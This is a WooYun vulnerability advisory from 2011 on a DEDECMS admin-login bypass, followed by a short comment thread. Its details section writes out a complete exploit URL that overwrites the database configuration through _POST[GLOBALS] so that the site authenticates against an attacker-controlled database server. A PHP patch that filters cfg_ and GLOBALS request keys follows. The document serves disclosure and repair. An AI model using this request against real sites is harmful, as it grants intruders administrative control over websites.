当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(5) 关注此漏洞

缺陷编号: WooYun-2011-02663

漏洞标题: DEDECMS爆严重安全漏洞

相关厂商: Dedecms

漏洞作者: effort5

提交时间: 2011-08-11 14:58

公开时间: 2011-08-16 15:00

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 10

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 第三方不可信程序 php源码审核 php源码分析 dedecms 白盒测试

1人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-08-11: 细节已通知厂商并且等待厂商处理中
2011-08-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”

详细说明:

http://**.**.**.**/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=**.**.**.**&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面黑底黄字上的字母改为当前的验证码,即可直接进入网站后台。



漏洞证明:

修复方案:

此漏洞的前提是必须得到后台路径才能实现,因此大家一定要养成使用DEDECM建站时改后台名字的习惯。下面给出官方的解决办法:



解决办法:

找到include/common.inc.php文件,把





foreach($_REQUEST as $_k=>$_v)

{

var_dump($_k);

if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )

{

exit('Request var not allow!');

}

}



换成



//检查和注册外部提交的变量

function CheckRequest(&$val) {

if (is_array($val)) {

foreach ($val as $_k=>$_v) {

CheckRequest($_k);

CheckRequest($val[$_k]);

}

} else

{

if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )

{

exit('Request var not allow!');

}

}

}

CheckRequest($_REQUEST);

版权声明:转载请注明来源 effort5@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:10 (WooYun评价)


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2011-08-11 17:33 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)
    1

    万恶的php标签

  2. 2011-08-12 10:04 | tenzy ( 普通白帽子 | Rank:176 漏洞数:21 | Need not to know)
    1

    ...该爆的还是会爆的。。好久的洞洞了

  3. 2011-08-15 00:24 | 白细胞 ( 路人 | Rank:17 漏洞数:6 )
    1

    流亡青年他们几个搞的,在上传案例那里,怀疑是上传漏洞。http://www.dedecms.com/caseshow/sck.html

登录后才能发表评论,请先 登录